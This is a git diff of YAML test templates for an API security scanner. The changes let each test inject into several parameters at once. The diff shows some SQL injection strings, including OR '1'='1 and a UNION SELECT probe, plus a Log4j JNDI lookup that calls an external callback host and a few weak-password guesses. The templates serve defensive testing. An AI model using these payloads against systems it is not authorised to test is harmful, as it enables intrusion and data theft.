exit - req: - modify_body_param: - userKey: ${userVal}${advUnionXSSNegativePayloads} + ${userKey}: ${userVal}${advUnionXSSNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 diff --git a/Broken-User-Authentication/AlternateEncodingSQLi.yml b/Broken-User-Authentication/AlternateEncodingSQLi.yml index 1933258a3..387f68c2c 100644 --- a/Broken-User-Authentication/AlternateEncodingSQLi.yml +++ b/Broken-User-Authentication/AlternateEncodingSQLi.yml @@ -82,7 +82,7 @@ api_selection_filters: for_one: key: regex: "username|^user$|^userid$|^user_id$|^login$|^login_id$|email|^account$|^account_id$|^member$|^member_id$|^id$|^user_name$|^uname$|^identifier$|^user_identifier$|^admin$|^nick$|^nickname$|^handle$|^alias$|^principal$|^profile$|^profile_id$|^name$|^signin$|^auth$|^credential$|^user_login$|^user_account$|^user_email$|^employee$|^employee_id$|^operator$|^customer_id$|^client_id$|^subscriber$|^subscriber_id$|^participant$|^participant_id$|^client_id$|^userLoginID$|^client-name$" - extract: userKey + extractMultiple: userKey value: extract: userVal wordLists: @@ -107,7 +107,8 @@ execute: requests: - req: - modify_body_param: - userKey: ${userVal}${encodingPayloads} + ${userKey}: ${userVal}${encodingPayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -147,7 +148,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${userVal}${encodingNegativePayloads} + ${userKey}: ${userVal}${encodingNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -188,7 +190,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${userVal}${encodingNegativePayloads} + ${userKey}: ${userVal}${encodingNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 diff --git a/Broken-User-Authentication/AlternateEncodingSQLiGET.yml b/Broken-User-Authentication/AlternateEncodingSQLiGET.yml index 4147fd467..036b93c50 100644 --- a/Broken-User-Authentication/AlternateEncodingSQLiGET.yml +++ b/Broken-User-Authentication/AlternateEncodingSQLiGET.yml @@ -73,7 +73,7 @@ api_selection_filters: for_one: key: regex: ".*" - extract: userKey + extractMultiple: userKey value: extract: userVal wordLists: @@ -98,7 +98,8 @@ execute: requests: - req: - modify_query_param: - userKey: ${userVal}${encodingPayloads} + ${userKey}: ${userVal}${encodingPayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -138,7 +139,8 @@ execute: - failure: exit - req: - modify_query_param: - userKey: ${userVal}${encodingNegativePayloads} + ${userKey}: ${userVal}${encodingNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -179,7 +181,8 @@ execute: - failure: exit - req: - modify_query_param: - userKey: ${userVal}${encodingNegativePayloads} + ${userKey}: ${userVal}${encodingNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 diff --git a/Broken-User-Authentication/AlternateEncodingSQLiPOST.yml b/Broken-User-Authentication/AlternateEncodingSQLiPOST.yml index fa7a61ff3..418e323eb 100644 --- a/Broken-User-Authentication/AlternateEncodingSQLiPOST.yml +++ b/Broken-User-Authentication/AlternateEncodingSQLiPOST.yml @@ -73,7 +73,7 @@ api_selection_filters: for_one: key: regex: ".*" - extract: userKey + extractMultiple: userKey value: extract: userVal wordLists: @@ -98,7 +98,8 @@ execute: requests: - req: - modify_body_param: - userKey: ${userVal}${encodingPayloads} + ${userKey}: ${userVal}${encodingPayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -138,7 +139,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${userVal}${encodingNegativePayloads} + ${userKey}: ${userVal}${encodingNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -179,7 +181,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${userVal}${encodingNegativePayloads} + ${userKey}: ${userVal}${encodingNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 diff --git a/Broken-User-Authentication/AuthBypassMultiCredentials.yml b/Broken-User-Authentication/AuthBypassMultiCredentials.yml index 811397ccb..e3ef4b975 100644 --- a/Broken-User-Authentication/AuthBypassMultiCredentials.yml +++ b/Broken-User-Authentication/AuthBypassMultiCredentials.yml @@ -79,15 +79,16 @@ api_selection_filters: for_one: key: regex: "password|^pass$|^pwd$|^user_password$|^userpass$|^passwd$|^user_pwd$|^password1$|^userPass$|^login_password$|^loginpassword$|^user_pass$|^access_password$|^secret$|^user_secret$" - extract: passwordkey + extractMultiple: passwordkey extract: respbody execute: type: single requests: - req: - modify_body_param: - passwordkey: + ${passwordkey}: - "${respbody}" + for_each_combination: true validate: response_code: gte: 200 diff --git a/Broken-User-Authentication/AuthBypassMultiCredentialsSingleParam.yml b/Broken-User-Authentication/AuthBypassMultiCredentialsSingleParam.yml index 5aebda72f..6326cc1b3 100644 --- a/Broken-User-Authentication/AuthBypassMultiCredentialsSingleParam.yml +++ b/Broken-User-Authentication/AuthBypassMultiCredentialsSingleParam.yml @@ -78,7 +78,7 @@ api_selection_filters: for_one: key: regex: "password|^pass$|^pwd$|^user_password$|^userpass$|^passwd$|^user_pwd$|^password1$|^userPass$|^login_password$|^loginpassword$|^user_pass$|^access_password$|^secret$|^user_secret$" - extract: passwordKey + extractMultiple: passwordKey value: extract: passwordVal execute: @@ -86,11 +86,12 @@ execute: requests: - req: - modify_body_param: - passwordKey: + ${passwordKey}: - "${passwordVal}" - random - "123456" - qwerty + for_each_combination: true validate: response_code: gte: 200 diff --git a/Broken-User-Authentication/BasicUnionBasedSQLiGET.yml b/Broken-User-Authentication/BasicUnionBasedSQLiGET.yml index 138efdc38..8ed983c49 100644 --- a/Broken-User-Authentication/BasicUnionBasedSQLiGET.yml +++ b/Broken-User-Authentication/BasicUnionBasedSQLiGET.yml @@ -74,7 +74,7 @@ api_selection_filters: for_one: key: regex: ".*" - extract: userKey + extractMultiple: userKey value: extract: userVal wordLists: @@ -103,7 +103,8 @@ execute: requests: - req: - modify_query_param: - userKey: ${userVal}${unionBasedPayloads} + ${userKey}: ${userVal}${unionBasedPayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -149,7 +150,8 @@ execute: - failure: exit - req: - modify_query_param: - userKey: ${userVal}${unionNegativeBasedPayloads} + ${userKey}: ${userVal}${unionNegativeBasedPayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -196,7 +198,8 @@ execute: - failure: exit - req: - modify_query_param: - userKey: ${userVal}${unionNegativeBasedPayloads} + ${userKey}: ${userVal}${unionNegativeBasedPayloads} + for_each_combination: true - validate: response_code: gte: 200 diff --git a/Broken-User-Authentication/BasicUnionBasedSQLiLoginEndpoint.yml b/Broken-User-Authentication/BasicUnionBasedSQLiLoginEndpoint.yml index 018eb5f08..6d63d021f 100644 --- a/Broken-User-Authentication/BasicUnionBasedSQLiLoginEndpoint.yml +++ b/Broken-User-Authentication/BasicUnionBasedSQLiLoginEndpoint.yml @@ -82,7 +82,7 @@ api_selection_filters: for_one: key: regex: "username|^user$|^userid$|^user_id$|^login$|^login_id$|email|^account$|^account_id$|^member$|^member_id$|^id$|^user_name$|^uname$|^identifier$|^user_identifier$|^admin$|^nick$|^nickname$|^handle$|^alias$|^principal$|^profile$|^profile_id$|^name$|^signin$|^auth$|^credential$|^user_login$|^user_account$|^user_email$|^employee$|^employee_id$|^operator$|^customer_id$|^client_id$|^subscriber$|^subscriber_id$|^participant$|^participant_id$|^client_id$|^userLoginID$|^client-name$" - extract: userKey + extractMultiple: userKey value: extract: userVal wordLists: @@ -111,7 +111,8 @@ execute: requests: - req: - modify_body_param: - userKey: ${userVal}${unionBasedPayloads} + ${userKey}: ${userVal}${unionBasedPayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -157,7 +158,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${userVal}${unionNegativeBasedPayloads} + ${userKey}: ${userVal}${unionNegativeBasedPayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -204,7 +206,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${userVal}${unionNegativeBasedPayloads} + ${userKey}: ${userVal}${unionNegativeBasedPayloads} + for_each_combination: true - validate: response_code: gte: 200 diff --git a/Broken-User-Authentication/BasicUnionBasedSQLiPOST.yml b/Broken-User-Authentication/BasicUnionBasedSQLiPOST.yml index 1f0c33afc..207fcd5f0 100644 --- a/Broken-User-Authentication/BasicUnionBasedSQLiPOST.yml +++ b/Broken-User-Authentication/BasicUnionBasedSQLiPOST.yml @@ -74,7 +74,7 @@ api_selection_filters: for_one: key: regex: ".*" - extract: userKey + extractMultiple: userKey value: extract: userVal wordLists: @@ -103,7 +103,8 @@ execute: requests: - req: - modify_body_param: - userKey: ${userVal}${unionBasedPayloads} + ${userKey}: ${userVal}${unionBasedPayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -149,7 +150,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${userVal}${unionNegativeBasedPayloads} + ${userKey}: ${userVal}${unionNegativeBasedPayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -196,7 +198,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${userVal}${unionNegativeBasedPayloads} + ${userKey}: ${userVal}${unionNegativeBasedPayloads} + for_each_combination: true - validate: response_code: gte: 200 diff --git a/Broken-User-Authentication/BooleanBasedSQLiGET.yml b/Broken-User-Authentication/BooleanBasedSQLiGET.yml index 0c9a114c3..55c451180 100644 --- a/Broken-User-Authentication/BooleanBasedSQLiGET.yml +++ b/Broken-User-Authentication/BooleanBasedSQLiGET.yml @@ -73,7 +73,7 @@ api_selection_filters: for_one: key: regex: ".*" - extract: userKey + extractMultiple: userKey value: extract: userVal wordLists: @@ -108,7 +108,8 @@ execute: requests: - req: - modify_query_param: - userKey: ${userVal}${falseCasePayloads} + ${userKey}: ${userVal}${falseCasePayloads} + for_each_combination: true - validate: or: - response_code: @@ -138,7 +139,8 @@ execute: - failure: exit - req: - modify_query_param: - userKey: ${userVal}${trueCasePayloads} + ${userKey}: ${userVal}${trueCasePayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -171,7 +173,8 @@ execute: - add_header: dummyHeader: dummyValue - modify_query_param: - userKey: ${userVal}${trueCasePayloads} + ${userKey}: ${userVal}${trueCasePayloads} + for_each_combination: true - validate: response_code: gte: 200 diff --git a/Broken-User-Authentication/BooleanBasedSQLiLoginEndpoint.yml b/Broken-User-Authentication/BooleanBasedSQLiLoginEndpoint.yml index 373617677..77524f164 100644 --- a/Broken-User-Authentication/BooleanBasedSQLiLoginEndpoint.yml +++ b/Broken-User-Authentication/BooleanBasedSQLiLoginEndpoint.yml @@ -82,7 +82,7 @@ api_selection_filters: for_one: key: regex: "username|^user$|^userid$|^user_id$|^login$|^login_id$|email|^account$|^account_id$|^member$|^member_id$|^id$|user_name|^uname$|^identifier$|^user_identifier$|^admin$|^nick$|^nickname$|^handle$|^alias$|^principal$|^profile$|^profile_id$|^name$|^signin$|^auth$|^credential$|^user_login$|^user_account$|^user_email$|^employee$|^employee_id$|^operator$|^customer_id$|^client_id$|^subscriber$|^subscriber_id$|^participant$|^participant_id$|^client_id$|^userLoginID$|^client-name$" - extract: userKey + extractMultiple: userKey value: extract: userVal wordLists: @@ -117,7 +117,8 @@ execute: requests: - req: - modify_body_param: - userKey: ${userVal}${falseCasePayloads} + ${userKey}: ${userVal}${falseCasePayloads} + for_each_combination: true - validate: or: - response_code: @@ -146,7 +147,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${userVal}${trueCasePayloads} + ${userKey}: ${userVal}${trueCasePayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -178,7 +180,8 @@ execute: - add_header: dummyHeader: dummyValue - modify_body_param: - userKey: ${userVal}${trueCasePayloads} + ${userKey}: ${userVal}${trueCasePayloads} + for_each_combination: true - validate: response_code: gte: 200 diff --git a/Broken-User-Authentication/BooleanBasedSQLiPOST.yml b/Broken-User-Authentication/BooleanBasedSQLiPOST.yml index 26f8ed344..2e893c2c0 100644 --- a/Broken-User-Authentication/BooleanBasedSQLiPOST.yml +++ b/Broken-User-Authentication/BooleanBasedSQLiPOST.yml @@ -73,7 +73,7 @@ api_selection_filters: for_one: key: regex: ".*" - extract: userKey + extractMultiple: userKey value: extract: userVal wordLists: @@ -108,7 +108,8 @@ execute: requests: - req: - modify_body_param: - userKey: ${userVal}${falseCasePayloads} + ${userKey}: ${userVal}${falseCasePayloads} + for_each_combination: true - validate: or: - response_code: @@ -137,7 +138,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${userVal}${trueCasePayloads} + ${userKey}: ${userVal}${trueCasePayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -170,7 +172,8 @@ execute: - add_header: dummyHeader: dummyValue - modify_body_param: - userKey: ${userVal}${trueCasePayloads} + ${userKey}: ${userVal}${trueCasePayloads} + for_each_combination: true - validate: response_code: gte: 200 diff --git a/Broken-User-Authentication/BooleanBasedSQLiXSS.yml b/Broken-User-Authentication/BooleanBasedSQLiXSS.yml index 478fdb572..b01fc103c 100644 --- a/Broken-User-Authentication/BooleanBasedSQLiXSS.yml +++ b/Broken-User-Authentication/BooleanBasedSQLiXSS.yml @@ -80,7 +80,7 @@ api_selection_filters: for_one: key: regex: "username|^user$|^userid$|^user_id$|^login$|^login_id$|email|^account$|^account_id$|^member$|^member_id$|^id$|^user_name$|^uname$|^identifier$|^user_identifier$|^admin$|^nick$|^nickname$|^handle$|^alias$|^principal$|^profile$|^profile_id$|^name$|^signin$|^auth$|^credential$|^user_login$|^user_account$|^user_email$|^employee$|^employee_id$|^operator$|^customer_id$|^client_id$|^subscriber$|^subscriber_id$|^participant$|^participant_id$|^client_id$|^userLoginID$|^client-name$" - extract: userKey + extractMultiple: userKey value: extract: userVal wordLists: @@ -103,7 +103,8 @@ execute: requests: - req: - modify_body_param: - userKey: ${userVal}${booleanXSSPayloads} + ${userKey}: ${userVal}${booleanXSSPayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -154,7 +155,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${userVal}${booleanXSSNegativePayloads} + ${userKey}: ${userVal}${booleanXSSNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -203,7 +205,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${userVal}${booleanXSSNegativePayloads} + ${userKey}: ${userVal}${booleanXSSNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 diff --git a/Broken-User-Authentication/BooleanBasedSQLiXSSGET.yml b/Broken-User-Authentication/BooleanBasedSQLiXSSGET.yml index 8551ea86a..46ddbefd7 100644 --- a/Broken-User-Authentication/BooleanBasedSQLiXSSGET.yml +++ b/Broken-User-Authentication/BooleanBasedSQLiXSSGET.yml @@ -75,7 +75,7 @@ api_selection_filters: for_one: key: regex: ".*" - extract: userKey + extractMultiple: userKey value: extract: userVal wordLists: @@ -98,7 +98,8 @@ execute: requests: - req: - modify_query_param: - userKey: ${userVal}${booleanXSSPayloads} + ${userKey}: ${userVal}${booleanXSSPayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -149,7 +150,8 @@ execute: - failure: exit - req: - modify_query_param: - userKey: ${userVal}${booleanXSSNegativePayloads} + ${userKey}: ${userVal}${booleanXSSNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -198,7 +200,8 @@ execute: - failure: exit - req: - modify_query_param: - userKey: ${userVal}${booleanXSSNegativePayloads} + ${userKey}: ${userVal}${booleanXSSNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 diff --git a/Broken-User-Authentication/BooleanBasedSQLiXSSPOST.yml b/Broken-User-Authentication/BooleanBasedSQLiXSSPOST.yml index 0daf3696c..d48358957 100644 --- a/Broken-User-Authentication/BooleanBasedSQLiXSSPOST.yml +++ b/Broken-User-Authentication/BooleanBasedSQLiXSSPOST.yml @@ -75,7 +75,7 @@ api_selection_filters: for_one: key: regex: ".*" - extract: userKey + extractMultiple: userKey value: extract: userVal wordLists: @@ -98,7 +98,8 @@ execute: requests: - req: - modify_body_param: - userKey: ${userVal}${booleanXSSPayloads} + ${userKey}: ${userVal}${booleanXSSPayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -149,7 +150,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${userVal}${booleanXSSNegativePayloads} + ${userKey}: ${userVal}${booleanXSSNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -198,7 +200,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${userVal}${booleanXSSNegativePayloads} + ${userKey}: ${userVal}${booleanXSSNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 diff --git a/Broken-User-Authentication/ErrorBasedSQLiXSS.yml b/Broken-User-Authentication/ErrorBasedSQLiXSS.yml index 8363b0f30..a9f81a888 100644 --- a/Broken-User-Authentication/ErrorBasedSQLiXSS.yml +++ b/Broken-User-Authentication/ErrorBasedSQLiXSS.yml @@ -80,7 +80,7 @@ api_selection_filters: for_one: key: regex: "username|^user$|^userid$|^user_id$|^login$|^login_id$|email|^account$|^account_id$|^member$|^member_id$|^id$|^user_name$|^uname$|^identifier$|^user_identifier$|^admin$|^nick$|^nickname$|^handle$|^alias$|^principal$|^profile$|^profile_id$|^name$|^signin$|^auth$|^credential$|^user_login$|^user_account$|^user_email$|^employee$|^employee_id$|^operator$|^customer_id$|^client_id$|^subscriber$|^subscriber_id$|^participant$|^participant_id$|^client_id$|^userLoginID$|^client-name$" - extract: userKey + extractMultiple: userKey value: extract: userVal wordLists: @@ -103,7 +103,8 @@ execute: requests: - req: - modify_body_param: - userKey: ${userVal}${errorXSSPayloads} + ${userKey}: ${userVal}${errorXSSPayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -151,7 +152,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${userVal}${errorXSSNegativePayloads} + ${userKey}: ${userVal}${errorXSSNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -199,7 +201,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${userVal}${errorXSSNegativePayloads} + ${userKey}: ${userVal}${errorXSSNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 diff --git a/Broken-User-Authentication/JWTAppendSQLInjectionMySQL.yml b/Broken-User-Authentication/JWTAppendSQLInjectionMySQL.yml index 964ce2523..5a2e34af0 100644 --- a/Broken-User-Authentication/JWTAppendSQLInjectionMySQL.yml +++ b/Broken-User-Authentication/JWTAppendSQLInjectionMySQL.yml @@ -78,7 +78,7 @@ api_selection_filters: - authorization - auth-token - access-token - extract: headerKey + extractMultiple: headerKey value: contains_jwt: true wordLists: @@ -96,7 +96,8 @@ execute: requests: - req: - modify_header: - headerKey: "Bearer ${JWTPayloads}" + ${headerKey}: "Bearer ${JWTPayloads}" + for_each_combination: true - validate: response_code: gte: 200 @@ -135,7 +136,8 @@ execute: - failure: exit - req: - modify_header: - headerKey: "Bearer ${negativeJWTPayloads}" + ${headerKey}: "Bearer ${negativeJWTPayloads}" + for_each_combination: true - validate: response_code: gte: 200 @@ -178,7 +180,8 @@ execute: - failure: exit - req: - modify_header: - headerKey: "Bearer ${negativeJWTPayloads}" + ${headerKey}: "Bearer ${negativeJWTPayloads}" + for_each_combination: true - validate: response_code: gte: 200 diff --git a/Broken-User-Authentication/JWTAppendSQLInjectionPostgreSQL.yml b/Broken-User-Authentication/JWTAppendSQLInjectionPostgreSQL.yml index c690cd842..ed8522d80 100644 --- a/Broken-User-Authentication/JWTAppendSQLInjectionPostgreSQL.yml +++ b/Broken-User-Authentication/JWTAppendSQLInjectionPostgreSQL.yml @@ -78,7 +78,7 @@ api_selection_filters: - authorization - auth-token - access-token - extract: headerKey + extractMultiple: headerKey value: contains_jwt: true wordLists: @@ -97,7 +97,8 @@ execute: requests: - req: - modify_header: - headerKey: "Bearer ${JWTPayloads}" + ${headerKey}: "Bearer ${JWTPayloads}" + for_each_combination: true - validate: response_code: gte: 200 @@ -136,7 +137,8 @@ execute: - failure: exit - req: - modify_header: - headerKey: "Bearer ${negativeJWTPayloads}" + ${headerKey}: "Bearer ${negativeJWTPayloads}" + for_each_combination: true - validate: response_code: gte: 200 @@ -179,7 +181,8 @@ execute: - failure: exit - req: - modify_header: - headerKey: "Bearer ${negativeJWTPayloads}" + ${headerKey}: "Bearer ${negativeJWTPayloads}" + for_each_combination: true - validate: response_code: gte: 200 diff --git a/Broken-User-Authentication/JWTAppendSQLInjectionSQLite.yml b/Broken-User-Authentication/JWTAppendSQLInjectionSQLite.yml index 22c919618..797cbac9c 100644 --- a/Broken-User-Authentication/JWTAppendSQLInjectionSQLite.yml +++ b/Broken-User-Authentication/JWTAppendSQLInjectionSQLite.yml @@ -78,7 +78,7 @@ api_selection_filters: - authorization - auth-token - access-token - extract: headerKey + extractMultiple: headerKey value: contains_jwt: true wordLists: @@ -97,7 +97,8 @@ execute: requests: - req: - modify_header: - headerKey: "Bearer ${JWTPayloads}" + ${headerKey}: "Bearer ${JWTPayloads}" + for_each_combination: true - validate: response_code: gte: 200 @@ -139,7 +140,8 @@ execute: - failure: exit - req: - modify_header: - headerKey: "Bearer ${negativeJWTPayloads}" + ${headerKey}: "Bearer ${negativeJWTPayloads}" + for_each_combination: true - validate: response_code: gte: 200 @@ -185,7 +187,8 @@ execute: - failure: exit - req: - modify_header: - headerKey: "Bearer ${negativeJWTPayloads}" + ${headerKey}: "Bearer ${negativeJWTPayloads}" + for_each_combination: true - validate: response_code: gte: 200 diff --git a/Broken-User-Authentication/Log4jRequestParams.yml b/Broken-User-Authentication/Log4jRequestParams.yml index b6ada4050..382098253 100644 --- a/Broken-User-Authentication/Log4jRequestParams.yml +++ b/Broken-User-Authentication/Log4jRequestParams.yml @@ -77,12 +77,12 @@ api_selection_filters: for_one: key: regex: ".*" - extract: bodyKey + extractMultiple: bodyKey - query_param: for_one: key: regex: ".*" - extract: queryKey + extractMultiple: queryKey execute: type: single @@ -91,9 +91,11 @@ execute: - send_ssrf_req: url: "https://test-services.akto.io/store_uuid/3523ddf7-51ef-462b-a452-f33246aae6bb" - modify_body_param: - bodyKey: "${jndi1}{jndi:https://test-services.akto.io/3523ddf7-51ef-462b-a452-f33246aae6bb}" + ${bodyKey}: "${jndi1}{jndi:https://test-services.akto.io/3523ddf7-51ef-462b-a452-f33246aae6bb}" + for_each_combination: true - modify_query_param: - queryKey: "${jndi1}{jndi:https://test-services.akto.io/3523ddf7-51ef-462b-a452-f33246aae6bb}" + ${queryKey}: "${jndi1}{jndi:https://test-services.akto.io/3523ddf7-51ef-462b-a452-f33246aae6bb}" + for_each_combination: true validate: response_payload: length: diff --git a/Broken-User-Authentication/NoSQLiErrorBasedParamMongoSpecialCharacters.yml b/Broken-User-Authentication/NoSQLiErrorBasedParamMongoSpecialCharacters.yml index 504843a1b..c4bb84a0c 100644 --- a/Broken-User-Authentication/NoSQLiErrorBasedParamMongoSpecialCharacters.yml +++ b/Broken-User-Authentication/NoSQLiErrorBasedParamMongoSpecialCharacters.yml @@ -81,12 +81,12 @@ api_selection_filters: for_one: key: contains_either: ${attempt_Ids} - extract: changed_body_key + extractMultiple: changed_body_key - query_param: for_one: key: contains_either: ${attempt_Ids} - extract: changed_query_key + extractMultiple: changed_query_key wordLists: attempt_Ids: - "name" @@ -118,9 +118,11 @@ execute: requests: - req: - modify_body_param: - changed_body_key: ${specialCharacters} + ${changed_body_key}: ${specialCharacters} + for_each_combination: true - modify_query_param: - changed_query_key: ${specialCharacters} + ${changed_query_key}: ${specialCharacters} + for_each_combination: true validate: or: - response_payload: diff --git a/Broken-User-Authentication/NoSQLiErrorBasedQueryParamMongoose.yml b/Broken-User-Authentication/NoSQLiErrorBasedQueryParamMongoose.yml index 75ccd94df..046dd5804 100644 --- a/Broken-User-Authentication/NoSQLiErrorBasedQueryParamMongoose.yml +++ b/Broken-User-Authentication/NoSQLiErrorBasedQueryParamMongoose.yml @@ -45,7 +45,7 @@ api_selection_filters: for_one: key: regex: .* - extract: changed_query_key + extractMultiple: changed_query_key value: regex: .* extract: changed_query_value diff --git a/Broken-User-Authentication/PaymentGatewaySQLInjectionMySQL.yml b/Broken-User-Authentication/PaymentGatewaySQLInjectionMySQL.yml index 7f39c114a..9e2de306c 100644 --- a/Broken-User-Authentication/PaymentGatewaySQLInjectionMySQL.yml +++ b/Broken-User-Authentication/PaymentGatewaySQLInjectionMySQL.yml @@ -93,7 +93,7 @@ api_selection_filters: for_one: key: regex: ".*" - extract: userKey + extractMultiple: userKey wordLists: paymentPayloads: - "12345' OR '1'='1 --" @@ -128,7 +128,8 @@ execute: requests: - req: - modify_body_param: - userKey: ${paymentPayloads} + ${userKey}: ${paymentPayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -177,7 +178,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${paymentNegativePayloads} + ${userKey}: ${paymentNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -226,7 +228,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${paymentNegativePayloads} + ${userKey}: ${paymentNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 diff --git a/Broken-User-Authentication/PaymentGatewaySQLInjectionPostgreSQL.yml b/Broken-User-Authentication/PaymentGatewaySQLInjectionPostgreSQL.yml index 2d4395262..289326698 100644 --- a/Broken-User-Authentication/PaymentGatewaySQLInjectionPostgreSQL.yml +++ b/Broken-User-Authentication/PaymentGatewaySQLInjectionPostgreSQL.yml @@ -86,7 +86,7 @@ api_selection_filters: for_one: key: regex: ".*" - extract: userKey + extractMultiple: userKey wordLists: paymentPayloads: - "12345' OR '1'='1 --" @@ -119,7 +119,8 @@ execute: requests: - req: - modify_body_param: - userKey: ${paymentPayloads} + ${userKey}: ${paymentPayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -169,7 +170,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${paymentNegativePayloads} + ${userKey}: ${paymentNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -220,7 +222,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${paymentNegativePayloads} + ${userKey}: ${paymentNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 diff --git a/Broken-User-Authentication/PaymentGatewaySQLInjectionSQLite.yml b/Broken-User-Authentication/PaymentGatewaySQLInjectionSQLite.yml index cc2a43c9d..09c13a273 100644 --- a/Broken-User-Authentication/PaymentGatewaySQLInjectionSQLite.yml +++ b/Broken-User-Authentication/PaymentGatewaySQLInjectionSQLite.yml @@ -86,7 +86,7 @@ api_selection_filters: for_one: key: regex: ".*" - extract: userKey + extractMultiple: userKey wordLists: paymentPayloads: - "12345' UNION SELECT NULL, sqlite_version(), NULL --" @@ -119,7 +119,8 @@ execute: requests: - req: - modify_body_param: - userKey: ${paymentPayloads} + ${userKey}: ${paymentPayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -170,7 +171,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${paymentNegativePayloads} + ${userKey}: ${paymentNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -221,7 +223,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${paymentNegativePayloads} + ${userKey}: ${paymentNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 diff --git a/Broken-User-Authentication/PaymentGatewaySQLiMySQLDBGET.yml b/Broken-User-Authentication/PaymentGatewaySQLiMySQLDBGET.yml index 31998fa95..cf16bbdf5 100644 --- a/Broken-User-Authentication/PaymentGatewaySQLiMySQLDBGET.yml +++ b/Broken-User-Authentication/PaymentGatewaySQLiMySQLDBGET.yml @@ -93,7 +93,7 @@ api_selection_filters: for_one: key: regex: ".*" - extract: userKey + extractMultiple: userKey wordLists: paymentPayloads: - "12345' OR '1'='1 --" @@ -128,7 +128,8 @@ execute: requests: - req: - modify_query_param: - userKey: ${paymentPayloads} + ${userKey}: ${paymentPayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -177,7 +178,8 @@ execute: - failure: exit - req: - modify_query_param: - userKey: ${paymentNegativePayloads} + ${userKey}: ${paymentNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -226,7 +228,8 @@ execute: - failure: exit - req: - modify_query_param: - userKey: ${paymentNegativePayloads} + ${userKey}: ${paymentNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 diff --git a/Broken-User-Authentication/PaymentGatewaySQLiSQLiteGET.yml b/Broken-User-Authentication/PaymentGatewaySQLiSQLiteGET.yml index 523bc6e4a..a2475e1d4 100644 --- a/Broken-User-Authentication/PaymentGatewaySQLiSQLiteGET.yml +++ b/Broken-User-Authentication/PaymentGatewaySQLiSQLiteGET.yml @@ -86,7 +86,7 @@ api_selection_filters: for_one: key: regex: ".*" - extract: userKey + extractMultiple: userKey wordLists: paymentPayloads: - "12345' UNION SELECT NULL, sqlite_version(), NULL --" @@ -119,7 +119,8 @@ execute: requests: - req: - modify_query_param: - userKey: ${paymentPayloads} + ${userKey}: ${paymentPayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -170,7 +171,8 @@ execute: - failure: exit - req: - modify_query_param: - userKey: ${paymentNegativePayloads} + ${userKey}: ${paymentNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -221,7 +223,8 @@ execute: - failure: exit - req: - modify_query_param: - userKey: ${paymentNegativePayloads} + ${userKey}: ${paymentNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 diff --git a/Broken-User-Authentication/RemoveXSRFToken.yml b/Broken-User-Authentication/RemoveXSRFToken.yml index d3877c410..f31ef9f95 100644 --- a/Broken-User-Authentication/RemoveXSRFToken.yml +++ b/Broken-User-Authentication/RemoveXSRFToken.yml @@ -73,7 +73,7 @@ api_selection_filters: for_one: key: regex: "(?i)xsrf" - extract: xsrfHeaderKey + 